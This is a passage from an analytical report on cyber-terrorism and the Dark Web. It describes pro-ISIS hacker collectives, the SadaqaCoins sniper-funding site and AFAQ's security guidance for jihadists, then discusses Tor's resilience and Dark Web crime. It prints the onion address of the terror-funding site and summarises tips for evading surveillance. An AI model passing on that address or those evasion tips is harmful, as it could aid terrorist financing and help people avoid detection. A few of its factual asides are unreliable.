Cyber Caliphate 's poor capabilities. This is another niche in which the rivalry
between Al-Qaeda and ISIS is expressed. But the fact that the Fighter
Moeslim Cyber Caliphate group was actively recruiting hacker/s,
demonstrates it was seeking to grow its cyber capabilities.
 Post by the Mujahidin Cyber Army on its Telegram channel
On May 26, 2017, after the extensive Wannacry cyberattack that took place
in early May 2017, a screenshot depicting the Wannacry the cyberattack,
which is essentially a copy of the ransomware Wannacry, was uploaded to
the Telegram channel of Fighter Moeslim Cyber Caliphate. This attack is
unique because the choice to use the technical means of ransomware is a
deviation from the group's usual method to simply hack site, and through this
virtual vandalism, it sends ideological messages expressing support of the
Islamic State. The Wannacry cyberattack did not focus on disseminating
ideology, but on the intention of generating economic profit. It should be
borne in mind that the use of ransomware for terrorism has a double potential
advantage—both generating economic profit to finance the terrorist activities
and causing economic harm to the site owners.

Left: a screenshot of the site being attacked. Right: a screenshot from the closed Telegram channel of
the Fighter Moeslim Cyber Caliphate group.

The pro-IS hacker group, Cyber Caliphate Ghosts, released a video in 2017 in
which it announced an electronic war against the crusader countries fighting
against the Islamic State. The first to be identified as targets for cyber-attacks
are military and government sites, and it has been made clear that the hackers
aim to damage infrastructure and leak personal information. Subsequently, a
list containing information on 17,487 personal meetings between students
with academic advisors stolen from the University of Michigan was posted
on its Telegram channels. It should be noted that this is not the first time that
the University of Michigan site has been hacked. In November 2016, hackers
entered the university's databases and stole personal information of students
and faculty members that included names, social security numbers, and dates
of birth, and the information was leaked on the internet.

Left: A screenshot of the Michigan University list; Right: screenshot from the Caliphate Cyber Ghosts
video.

The pro-IS hacker group, Team System DZ, hacked the servers of a company
hosting sites of schools in New Jersey and uploaded to the sites propaganda
videos encouraging recruitment to the Islamic State. The cyber-attack lasted
about two hours, during which the sites posted Islamic State propaganda
videos through YouTube uploads. It is believed that no personal information
of students or staff was leaked and that the attack amounted to defacement
and propaganda; The case was transferred for investigation by the FBI
(November 7, 2017).
Team System DZ posted on its Telegram account a video and a number of
banners threatening with the launching of an electronic attack on December
8, 2017, against the coalition countries participating in the war against the
Islamic State, especially against the United States. According to it, its friends
managed to hack into classified websites of the US Army, the Ministry of the
Interior, the State Department, and other offices and steal great quantities of
classified material. The group added that it intends to publish some of the
stolen information and send the rest to single terrorists so they assassinate the
individuals mentioned in the list and so as to intensify the scope of the
attacks. In the concluding remarks, the group stressed that the Islamic State
would eventually defeat its enemies.
In June 2018 a group called the Anshar Caliphate Army emerged, identifying
itself as part of the United Cyber Caliphate collective. The group was
recorded in closed Telegram groups revealing it was Indonesian.

Anshar Caliphate Army poster

On July 27, 2018, the Anshar Caliphate Army group published a poster for
the cyber-attacks carried out from May to July 2018 under #OpTheWorld,
detailed 160 sites that were corrupted in a defacement attack, including 110
Facebook accounts and 20 Instagram accounts. The attacks targeted websites
and accounts in India, Canada, Russia, England, the US, Israel, the
Netherlands, Germany, France, Brazil, Indonesia, Taiwan, and China.
 The announcement by the Anshar Caliphate Army
On August 28, 2018, the United Cyber Caliphate collective published an
infographic, which reported cyberattacks it had carried out over 70 days,
beginning on May 19, 2018. The attacks included the crashing of 770 sites by
DDoS attacks, hacking, and destroying more than 900 international sites,
hacking over 1,500 social media accounts. The groups that participated in the
attacks were: Anon Terror, Team System DZ, Islamic Intelligence, Caliphate
Cyber Army, Anshar Caliphate Army, Ghost Caliphate Section, Sons
Caliphate Army, Fighter Muslim Cyber Caliphate. The infographic was
posted on the Telegram channel in Arabic and English, under the
#OpTheWorld cyber campaign.
 The infographic published by the United Cyber Caliphate

The United Cyber Caliphate collective has been steadily growing since the
rise of the first group identified with it, Cyber Caliphate Army. The group
emerged in 2014, immediately after the establishment of the Caliphate, and
was led by Junaid Hussain, who was born in 1994 and fled from Britain to
join the Islamic State in 2013, after serving a prison sentence for breaking
into the email account of former British Prime Minister Tony Blair. From his
seat at the Islamic State Al-Raqqah base in Syria, al-Britani recruited and
nurtured the cyber caliphate he envisioned, until his elimination by an
American drone attack in August 2015 in Al-Raqqah. Since then there has
been an increase in the number of active groups, and five years later the
collective is now comprised of about ten groups.
SadaqaCoins
On August 17, 2018, the following post appeared on Twitter announcing a
mujahideen crowdsourced project that allows supporters to anonymously
fund Jihadi snipers by buying them a 4x4 pickup vehicle, a .50 bolt action
rifle and ammunition, wind readers for sniping, silencers, and even combat
training for aspiring jihadists, all on a Dark Web marketplace called
SadaqaCoins. “Sadaqa” is Arabic for “voluntary charity.”

http://sadaqabmnor4ufnj.onion
Prices on project ‘We Hunt’ range from $550 for a .50 cal silencer up to
$8,800 for a 4×4 all-terrain pickup vehicle, with other products including
Kestrel 4500NV weather reading equipment to provide snipers with wind
speeds and other info, Nikon p900 cameras for reconnaissance, ammunition
of various types and calibers, sniper scopes, and of course sniper rifles
themselves for $4,070.

‘We Hunt’ isn’t the only crowdfunding page on SadaqaCoins. Another

project enables users to donate $220 to purchase livestock which will then be
slaughtered in sacrificial prayer by the SadaqaCoins team on behalf of the
donors for the Muslim holiday Eid al-Adha (festival of sacrifice) where this
is a common practice.
SadaqaCoins posted a project in late 2018 called “The Forgotten Sisters” to
raise money to free five women imprisoned in Syria, listing their names and
dates of imprisonment with a crowdfunding goal of $14,850 which is to be
used for ransom. SadaqaCoins also mentions four ways to support the project
– advertising to others, buying cryptocurrency to donate, mining crypto for
donations, or a fourth method, “hustling” in which the site encourages readers
to hack or coerce cryptocurrency from non-Muslims in keeping with the
concept of Ghanima, the act of taking “war booty” from non-believers by
force. The site quotes Imam Shafi’i as saying:
Ghanima is property that the Muslims seize from the disbelievers by
means of overpowering them.
Pro-ISIS tech group AFAQ (Electronic Horizons Foundation)
The Electronic Horizon Foundation launched in January 2016 as an IT help
desk of sorts to walk ISIS supporters through how to encrypt their
communications and otherwise avoid detection online while coordinating
with and recruiting jihadists.

Pro-ISIS tech group AFAQ

The Electronic Horizon Foundation has since released a series of print and
video tutorials covering a range of mobile security and dark web how-tos. “It
is time to face the electronic surveillance, educate the mujahideen about the
dangers of the internet, and support them with the tools, directives and
security explanations to protect their electronic security, so that they don’t
commit security mistakes that can lead to their bombardment and killing,” the
group said in its founding announcement.
In early 2020, the Electronic Horizon Foundation published a 24-page
cybersecurity magazine for ISIS supporters walk jihadists through step-by-
step security for smartphones—while encouraging them to use a computer
instead for more secure terror-related business. The inaugural issue of “The
Supporter’s Security” published in English and Arabic versions.

24-page cybersecurity magazine for ISIS supporters

The Electronic Horizon Foundation walks through various operating systems

for Android in their setup guide, pages of graphics detailing what settings to
use on both Android and iPhone to better secure their communications.
“Good iOS security starts with having a really strong passcode,” the group
advises. “If this is something that’s easily guessable then everything else you
do is pretty much pointless” and advised jihadists to st0p using “123456” as a
password.
The ISIS cyber group also highlights “wrong security practices” including
browsing the internet without Tor or a VPN, downloading apps from third-
party sources, failing to encrypt the device or storage devices, neglecting to
install security updates, failing to use fake credentials on social media, and
using social media via apps instead of logging on through a browser. Jihadists
are also warned against opening potentially malicious links that can open
them to a security breach.
“The Mujahideen have been warned more than once about the danger of
smartphones, which led to the arrest of many brothers due to the security
negligence, so you must realize as a supporter of the truth that the security
measures that need to be applied for you are completely different from the
security measures used by anyone else,” the article states.

Final Word
Despite the heavy presence in the cyberspace by numerous terrorist
organizations, it appears that neither the terrorist organization nor their
supporters online, yet have the ability to execute significant cyberattacks,
such as on infrastructure. But the Wannacry ransomware cyberattack
demonstrates a growing capability. It will be interesting to watch what
happens over the next 10 years, since all these cyber-terrorist groups are
relatively new.
 FINAL WORD
In the late 1990s, two research organizations in the US Department of
Defense drove efforts to develop an anonymized and encrypted network that
would protect the sensitive communications of US spies. This secret network
would not be known or accessible to ordinary internet surfers. And while the
original clandestine intention was never fully realized, some of the
researchers saw a different value proposition at hand—launching a nonprofit
focused on anonymity for human rights and privacy activists.
Enter “Tor”—short for “The Onion Router”—given the many layers of
encryption that guard passing information. Tor lives on the fringe of the
internet and serves as the underlying technology of the Dark Web—a
collection of hidden sites inaccessible via a regular web browser and not
indexed by search engines such as Google. The Tor browser is free to
download and all that you need to unlock this hidden corner of the web where
privacy is paramount.
For individuals living under oppressive regimes that block large parts of the
internet or punish political dissent, the dark web is a lifeline that provides
access to information and protection from persecution. In freer societies, it
can be a critical whistle-blowing and communication tool that shields people
from retribution or judgment in the workplace or community. Alternatively, it
can simply deliver privacy and anonymity for those wary of how corporations
and governments are tracking, using, and potentially monetizing their data.
Today, many organizations maintain a hidden website on Tor, including
nearly every major newspaper, Facebook, and even the CIA. This is because
a Tor website demonstrates a commitment to privacy. The New York Times
and the CIA, for example, are both hoping to facilitate communication with
virtual walk-ins who can provide sensitive information.
Radical anonymity, however, casts a long shadow. The same privacy and
anonymity that deliver protection from tyrants and targeted advertisements
also make the Dark Web a safe haven for crime. The truth about the Dark
Web is that in addition to offering extreme privacy and protection from the
surveillance of authoritarian governments, it facilitates a growing
underground marketplace that sophisticated criminals use to traffic drugs,
stolen identities, and other illicit products and services. Websites support the
rhetoric of neo-Nazis, white supremacists, and other extremist groups flourish
on the Dark Web.
The pairing of Dark Web services with cryptocurrencies has led to
expectations of a boom in crime. A decade ago, an unknown cryptography
expert (with particular expertise in cracking passwords) who used the alias
Satoshi Nakamoto developed the world’s first currency and payment network
not controlled by a national government: Bitcoin. Originally a niche medium
of exchange for the technology community, Bitcoin emerged in 2011 as the
currency of choice for drug dealers conducting transactions on a dark-web
site known as the Silk Road. Over the past five years, the combination of an
encrypted network hidden from most of the world and a transactional
currency that is nearly untrackable by law enforcement officials resulted in a
small, but significant, marketplace of illicit vendors selling illegal wares.
Undoubtedly, the most disturbing of all Dark Web illegal activity is child
pornography. Tens of millions of images and videos of child abuse are
circulating on the Dark Web—and 50,000 new child abuse images are
uploaded each year, of which more than 70 percent are images of children
under the age of 10. Many show such graphic abuse that the media is turning
a blind eye to the problem. It is a topic that the media avoids, or it only
mentions in vague terms. Thus, the public is unaware and oblivious to the
sheer magnitude of the problem of online child abuse.
The Dark Web is also infested with plenty of scams and myths. For example,
hiring hitmen over the internet simply does not work. Scams are far easier,
less dangerous, and a more profitable model for criminals.
A “red room” is most certainly an urban legend. What is a red room? It’s
allegedly a website on the Dark Web where you can see and/or participate in
interactive torture or murder. But it's near-impossible to stream live video
over the Tor network. So, that would render a service like a red room
impossible. Websites presenting themselves as red rooms are in fact scams
aiming at stealing Bitcoins from the gullible. However, videos with ultra-
violent content, such as the infamous Daisy's Destruction by the notorious
child pornographer Peter Scully, can be found on the Dark Web.
Some say the Tor Project should be disbanded and the Dark Web shut down.
That will never work. The dark web can’t be shut down, and even if it was
shut down, a replacement would quickly emerge.
Because Tor is not on some server somewhere. Or more accurately, Tor is on
thousands upon thousands of servers, from actual servers in data centers to a
machine fired up intermittently in someone's basement. Tor nodes are on
every continent (except perhaps Antarctica), in hundreds of countries and
thousands of cities. In many of those jurisdictions, it is absolutely legal to run
a Tor node. Even in the ones where it isn't, unless you're an exit node, it'd be
pretty hard to find and identify, especially if you're taking appropriate
secondary precautions.
Similarly, the Tor software, both the browser and node setup software, is
open source and distributed from thousands upon thousands of machines
worldwide. So no individual government could put a stop to that either.
Prohibit distribution of Tor software in your country, and even succeed in
shutting down every machine doing it, well, people will just download it
from your neighbor. The internet doesn't much respect national borders.
There is no single point of failure. There is not some machine, somewhere,
that a government could seize and shut Tor down. There's no central relay, no
central tracker, nothing. It's all distributed throughout the whole network.
They could shut down one node, or even several, but the rest would hum
along just fine. The network would notice that particular node had dropped
off, and not route traffic to it anymore.
Even if a country were to shut off traffic it recognized as “Tor,” such traffic
could easily be rerouted over ports used for HTTPS. Secure HTTP is
necessary for any type of e-commerce, so for a government to totally shut
down encrypted traffic would mean that it would essentially shut down all
internet-based transactions. That would put your economy right in the toilet.
The whole point of encryption is that you don't and can't know what's in that
packet.
And if despite all that, somehow, someway, Tor were to be shut down or
fatally compromised, a similar distributed network would quickly take its
place. Plenty of cryptographers would know how to design a distributed,
decentralized network like that. It could be hidden even more deeply. It could
make even more hops between nodes.
Actually, Freenet is another such distributed system, already in use. So knock
out Tor, and people migrate there.
The whole thing is designed to be widely distributed and extremely tolerant
to the failure or compromise of any individual node, or even of a lot of nodes.
It was designed with the idea that some people may really, really not like it,
and would try to compromise it or get rid of it.
If it were possible to shut down Tor, compromise it to any significant degree,
or even prohibit its use locally, well, the Chinese government would have
found a way by now. The fact that they have not, and that millions of people
use Tor there to bypass the Great Firewall, is a testament to Tor’s resistance
to tactics like that.

Final Word
The Tor user base doesn’t just include bad guys—drug dealers and buyers,
terrorists, and child abuse image swappers. It also includes human rights
activists and others for whom it’s crucial to protect privacy so as to ensure
safety from persecution from oppressive regimes. But protecting political
dissidents, privacy advocates, and whistle-blowers should not come at the
expense of empowering child abusers, arms traffickers, and drug lords.
Therein lies the challenge for regulators and law enforcement agencies: to
devise approaches that walk the fine line of protecting liberal principles in an
age of information control while identifying and eradicating the most
insidious activities on the Dark Web.